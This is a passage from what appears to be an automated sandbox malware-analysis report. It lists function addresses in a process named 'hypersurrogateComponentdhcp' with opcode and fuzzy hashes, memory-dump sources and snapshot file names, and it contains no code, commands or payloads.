                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 49c6a205031896fd5f1655b7df05cbcf964d0617475b3b55e423857d6308e123
                                                                                                                                                                          • Instruction ID: d164403fd95cc1f32ba82d974f038d310c6c30532d30271d2e306c23fc63bf0b
                                                                                                                                                                          • Opcode Fuzzy Hash: 49c6a205031896fd5f1655b7df05cbcf964d0617475b3b55e423857d6308e123
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E315B20A1D99E8BE3399A5484B49757F61EF92301B2B47FAC487CB4A7C43DF981C381
                                                                                                                                                                          Function 00007FFD9BBB5BC0 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f545506808fdf0c75f82d38d1793f7f1d77b7f60ceacb913e3e10191e1fb510e
                                                                                                                                                                          • Instruction ID: 3bef956c757c35bb4c4df8a48465ef2608fcdd08068aca7b431251497f205dd4
                                                                                                                                                                          • Opcode Fuzzy Hash: f545506808fdf0c75f82d38d1793f7f1d77b7f60ceacb913e3e10191e1fb510e
                                                                                                                                                                          • Instruction Fuzzy Hash: E0314C10A2E5EA4BE339825844745757F93FF52308B1945FAD48A8F0FBC46C6985CB42
                                                                                                                                                                          Function 00007FFD9BBB2FC2 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3aeb420420a283b5691f79d29eccf3ff0564ec01f72b8756602d2cfc296c419d
                                                                                                                                                                          • Instruction ID: 9ba4ec8ba7faf03997b747b3f3856bdd6ccf1925f798228ca150ef2a0a6b42a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeb420420a283b5691f79d29eccf3ff0564ec01f72b8756602d2cfc296c419d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9621F871A0991D9FDF98EB58C4A5AEDB7B1FF68314F0101AAD04EE3291CA35A981CF40
                                                                                                                                                                          Function 00007FFD9BF78122 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6dc1dc40c58cb29a756986120bced644b9e94a966875082f51b31c227555cc50
                                                                                                                                                                          • Instruction ID: b26dbb322e03d6b3e1bff3aec83d934c9a9b2b1ff4c905a3c082fc54d0ebe971
                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc1dc40c58cb29a756986120bced644b9e94a966875082f51b31c227555cc50
                                                                                                                                                                          • Instruction Fuzzy Hash: F321F971E1891D9FDF98DF58C4A5AE9B7B1FF68300F1102AA904EE32A1CE35A941CB40
                                                                                                                                                                          Function 00007FFD9BF73260 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 166a3f507268dda229250942c61558c425405b44aea91057cdb06d47b94e4b71
                                                                                                                                                                          • Instruction ID: e2f6b108ee42c2bdf5905e201dd2489259af500e0783e222970da258b778cd09
                                                                                                                                                                          • Opcode Fuzzy Hash: 166a3f507268dda229250942c61558c425405b44aea91057cdb06d47b94e4b71
                                                                                                                                                                          • Instruction Fuzzy Hash: 71214D10A1D96B5BE7789A4884B49B43751FF51300B1647FAC49B8B4AACD2DFB8AC381
                                                                                                                                                                          Function 00007FFD9BBBCD8A Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: de26cb985054410dbdc5f0aa07985430b4433bf230b3e7b78791a95aa7b876ae
                                                                                                                                                                          • Instruction ID: 8af17c2799077829fdadcd9750b0e1ae9dad03439f742506a1997ea636cdaa4f
                                                                                                                                                                          • Opcode Fuzzy Hash: de26cb985054410dbdc5f0aa07985430b4433bf230b3e7b78791a95aa7b876ae
                                                                                                                                                                          • Instruction Fuzzy Hash: 1921F672B0EA9C4FEB59E7A894623AC7BA1FF59314F1500BAC049C72D3DD1869068B40
                                                                                                                                                                          Function 00007FFD9BBBE840 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5668b69e45980616fdcc6ebfc54537943949b6cfb4c09b6c2f61970ce287b6aa
                                                                                                                                                                          • Instruction ID: d8d910c8e4fffee15f5ff7b4e72527ed302a73cf3ad360bed6da285e98463f0c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5668b69e45980616fdcc6ebfc54537943949b6cfb4c09b6c2f61970ce287b6aa
                                                                                                                                                                          • Instruction Fuzzy Hash: 69110810B1DA7E4AF67D924888745B67651FF90309B194E79C45B8B4FACC2CBAC29AC0
                                                                                                                                                                          Function 00007FFD9BBB5BF0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4653dabbeb99df3a145712a6a446e126996a6f7ffc02f740eeb5417e79acc4a1
                                                                                                                                                                          • Instruction ID: 172544d0355fed7407ba8d6292b3917b1adc6e352b3f16a32aa2e5230723206c
                                                                                                                                                                          • Opcode Fuzzy Hash: 4653dabbeb99df3a145712a6a446e126996a6f7ffc02f740eeb5417e79acc4a1
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A11EB10A2D87E46E678824484745B57693FB9030DB154579D44B8B0EFC86CBA85DB82
                                                                                                                                                                          Function 00007FFD9BBB3AA3 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e2d3528e96fd02744e1b15b7619d0cfd63a9946815b2fb7190858b956c660b46
                                                                                                                                                                          • Instruction ID: bf5a9b78c848137d617113895c40a6a50c2180eed22d3b1ac3a4970b783d4264
                                                                                                                                                                          • Opcode Fuzzy Hash: e2d3528e96fd02744e1b15b7619d0cfd63a9946815b2fb7190858b956c660b46
                                                                                                                                                                          • Instruction Fuzzy Hash: 90119330B0991D4FDBA8DB58C865A2977E1FF48309F5201BAD05EC76E1CE24AD41CF00
                                                                                                                                                                          Function 00007FFD9BBBD8C0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cc6ca223990b7d70ea5b62ea5b4bdfe10cfecfe77da7f98556cc9e98cfcc7fe1
                                                                                                                                                                          • Instruction ID: 824ece496a8489545a8205af132e60964c9c8caf870f7bbb85f231edcf947ef7
                                                                                                                                                                          • Opcode Fuzzy Hash: cc6ca223990b7d70ea5b62ea5b4bdfe10cfecfe77da7f98556cc9e98cfcc7fe1
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D113621B09E0D0FDBA4EF64D860AF6B391FF54208F4106BAD14EC35D2CD29BA058781
                                                                                                                                                                          Function 00007FFD9BF76930 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e5ad00fb121bbf897be2c619820647c2f8df515e4b96064c0cff7a3e9c56366f
                                                                                                                                                                          • Instruction ID: 75f17f98cf7f9b5af9a40f3c5c8b64a87e2b0f58b62d7423722c9a1125b95eb9
                                                                                                                                                                          • Opcode Fuzzy Hash: e5ad00fb121bbf897be2c619820647c2f8df515e4b96064c0cff7a3e9c56366f
                                                                                                                                                                          • Instruction Fuzzy Hash: A4115B62F0EA8D6FE7709AB40CAD1B97AA0EF42300F0642FAD04DC71E2DD59EE058341
                                                                                                                                                                          Function 00007FFD9BBB4C70 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 668bd6443bf601f3d98134ea268343e4bd18c99cb215d50755437ceedcf6d33b
                                                                                                                                                                          • Instruction ID: c46c972baafdd1eb596da592bc08a5f3abeaaa0a3900f825eb6a9af0d924fc6d
                                                                                                                                                                          • Opcode Fuzzy Hash: 668bd6443bf601f3d98134ea268343e4bd18c99cb215d50755437ceedcf6d33b
                                                                                                                                                                          • Instruction Fuzzy Hash: 12115320709E0C0FCB60EBA49460AFE7391FF94300F41067AD54EC3AD2CE64FA458781
                                                                                                                                                                          Function 00007FFD9BF722E0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1216433b8c7f7b1badead4242b95628fb87946aae46cf61027ab6238a1962551
                                                                                                                                                                          • Instruction ID: 5aa536b7ee6dde88df7734f7fb610210014f126002dc28c4e33feeb3f893f332
                                                                                                                                                                          • Opcode Fuzzy Hash: 1216433b8c7f7b1badead4242b95628fb87946aae46cf61027ab6238a1962551
                                                                                                                                                                          • Instruction Fuzzy Hash: 90115B21709D4D4FCFA5EB78D4A16F973A1FF54200F4002BAC19AC36D2CE24F9058391
                                                                                                                                                                          Function 00007FFD9BF715F9 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f0dd914c938aecea4b34c90016c864d8a5d44d2d96909483cdc9b78ee15bee60
                                                                                                                                                                          • Instruction ID: 86a7ad2c076006503666db5ed69b4693003cb71d8fb456d077a443f65c9e6d40
                                                                                                                                                                          • Opcode Fuzzy Hash: f0dd914c938aecea4b34c90016c864d8a5d44d2d96909483cdc9b78ee15bee60
                                                                                                                                                                          • Instruction Fuzzy Hash: A3119C32A0F64D4FE731DEA09C646E93BB1EF02340F0603FAE055D71A1CD29AA49C751
                                                                                                                                                                          Function 00007FFD9BBB4AEE Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e8919e944b32a9ce1c23ce193b284d9920201123869ec07b54426ce4baa0a2b3
                                                                                                                                                                          • Instruction ID: 0ffb896af49922f75099c0042e8d6adc2af5deb83daf28152f57c563bd4d81a0
                                                                                                                                                                          • Opcode Fuzzy Hash: e8919e944b32a9ce1c23ce193b284d9920201123869ec07b54426ce4baa0a2b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C11663130990D4FDB24CB58E8607E93382FF85325F51027EDA19C3BD1CAA5A6948B80
                                                                                                                                                                          Function 00007FFD9BBBD73E Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 43b95df52450018adca3aa8d1478ef45fa1674fdd2dcb98f264b86a3266afb68
                                                                                                                                                                          • Instruction ID: bb0a6aa1ee26f9cf137c0cda24b1f2dd32f97d9827e830766d9af32f4ed4faeb
                                                                                                                                                                          • Opcode Fuzzy Hash: 43b95df52450018adca3aa8d1478ef45fa1674fdd2dcb98f264b86a3266afb68
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F11893130AA4D4FE715CE58E8647E67781FF45318F12027ECA59C36D2CA6AF650CB81
                                                                                                                                                                          Function 00007FFD9BF7215E Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e303e21f41492fd2ca0888f2f126f33f4bde5ec2913ce36ce3bafff848061f95
                                                                                                                                                                          • Instruction ID: fbfe6419762ba5a44e8e69b1a6761a47180ca66f68d026bf6f70f146ead6416a
                                                                                                                                                                          • Opcode Fuzzy Hash: e303e21f41492fd2ca0888f2f126f33f4bde5ec2913ce36ce3bafff848061f95
                                                                                                                                                                          • Instruction Fuzzy Hash: CA11AB3130A94E4FEB15CEA8E4A07E43791FF95324F1102BACA59C3AD1CA61E651C381
                                                                                                                                                                          Function 00007FFD9BF7068E Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 27301372688edfcdb146d8d75f0106a8957ad7993288561d71ad5f34666ff293
                                                                                                                                                                          • Instruction ID: 18f8fbfc24401de481f347c2096191093b4a84c0801ea646f7d512bdc2346f6c
                                                                                                                                                                          • Opcode Fuzzy Hash: 27301372688edfcdb146d8d75f0106a8957ad7993288561d71ad5f34666ff293
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E110D31A1991D8FDF9CDF58C4A5AADB7B1FF58300F0101BE900EE3691CE35A9408B00
                                                                                                                                                                          Function 00007FFD9BBB3B07 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 021fdf579be52b314c7463114792fe3c50493fc691f202761b1d359d6609f062
                                                                                                                                                                          • Instruction ID: f1891fe34b11ef60e467af6ee2410da2983b5c527b56c2b9231819bc1bae17d2
                                                                                                                                                                          • Opcode Fuzzy Hash: 021fdf579be52b314c7463114792fe3c50493fc691f202761b1d359d6609f062
                                                                                                                                                                          • Instruction Fuzzy Hash: 37113C30B04A0C8FCB98DF18C894A69B7E2FF99305B1142AED04ED76A6CE31AC40CF01
                                                                                                                                                                          Function 00007FFD9BBBB112 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 34da2405f26c96b5fda9cc4aeb1cef7a96a73b04a785610f188dff38b153750d
                                                                                                                                                                          • Instruction ID: f22931b6cfa5765815454c5c77386c30ff15453b0628ad5013c335424a0cb22f
                                                                                                                                                                          • Opcode Fuzzy Hash: 34da2405f26c96b5fda9cc4aeb1cef7a96a73b04a785610f188dff38b153750d
                                                                                                                                                                          • Instruction Fuzzy Hash: 6011C834E2992EDFDBA8EB88D460AAEB7B1FF58304F510179D00EE3291CA3569018B54
                                                                                                                                                                          Function 00007FFD9BBB3AAC Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5b3623d98c38edb8e3250fdb8d231736e03ba0763ccde5b48d4448c2ca2016be
                                                                                                                                                                          • Instruction ID: 6b1eefe99cae6406cab5408d0b0e800d8712e5850d2c39595cacecd7add636b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3623d98c38edb8e3250fdb8d231736e03ba0763ccde5b48d4448c2ca2016be
                                                                                                                                                                          • Instruction Fuzzy Hash: 32015230B05A1C8FD7A4CF18C8A9A69B7E2FF59304B0142AED05ED76A5CE31A9418B01
                                                                                                                                                                          Function 00007FFD9BBB32D2 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d0c362e9f77eba6a278bf6545db05db13e95f53d3b2fe81ecdad0a412287d17
                                                                                                                                                                          • Instruction ID: c69a4cba95cce0a2895d96944688392441ea7fc3a6c1cbec8f3cf3e7b13624f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d0c362e9f77eba6a278bf6545db05db13e95f53d3b2fe81ecdad0a412287d17
                                                                                                                                                                          • Instruction Fuzzy Hash: 11F0623255F2D99FD7229BB088625EA3FA4BF42218F1500F7D445C70E2C96D560A8B61
                                                                                                                                                                          Function 00007FFD9BF70962 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fb8e554c4efb2804aaed34480cda3cdc40ade65eb339a0bae97c2b15c8308940
                                                                                                                                                                          • Instruction ID: d75dad95aa021aa94356fac4a6f88ea377791bb0c797ff388f8f13bb2d2bfb97
                                                                                                                                                                          • Opcode Fuzzy Hash: fb8e554c4efb2804aaed34480cda3cdc40ade65eb339a0bae97c2b15c8308940
                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C83244F2C99FEB228FB088615D97FB4EF43700B1501F6D085C71B2C92D560AC751
                                                                                                                                                                          Function 00007FFD9BBBBF32 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c7b067a2570ef02284a0ec6f606298f5df70be7c46bd482e8d2c2d6dea00b9fd
                                                                                                                                                                          • Instruction ID: dc1ec5f4410eadc78d440f3b9d5517362ed43e2e8d998d55952d522be18acd01
                                                                                                                                                                          • Opcode Fuzzy Hash: c7b067a2570ef02284a0ec6f606298f5df70be7c46bd482e8d2c2d6dea00b9fd
                                                                                                                                                                          • Instruction Fuzzy Hash: A4F0963144E3CAAFD7229BB088255AA3FB4EF43204B1A01F6E045C70F2C52C5716CB62
                                                                                                                                                                          Function 00007FFD9BBB77D9 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3dff2377ad30f115c6fb2a463847470e651db48701f7c7bbd5a9ca3684f5f92f
                                                                                                                                                                          • Instruction ID: 97a194133a21bb86b695f9cf5da6591110f658d4d1668223e551fea4f79b3b5b
                                                                                                                                                                          • Opcode Fuzzy Hash: 3dff2377ad30f115c6fb2a463847470e651db48701f7c7bbd5a9ca3684f5f92f
                                                                                                                                                                          • Instruction Fuzzy Hash: 12E06D4188F2D61FD31713B50D664E23FA88E43161B0E00E3E884C94E3D84D429B8372
                                                                                                                                                                          Function 00007FFD9BBBD718 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
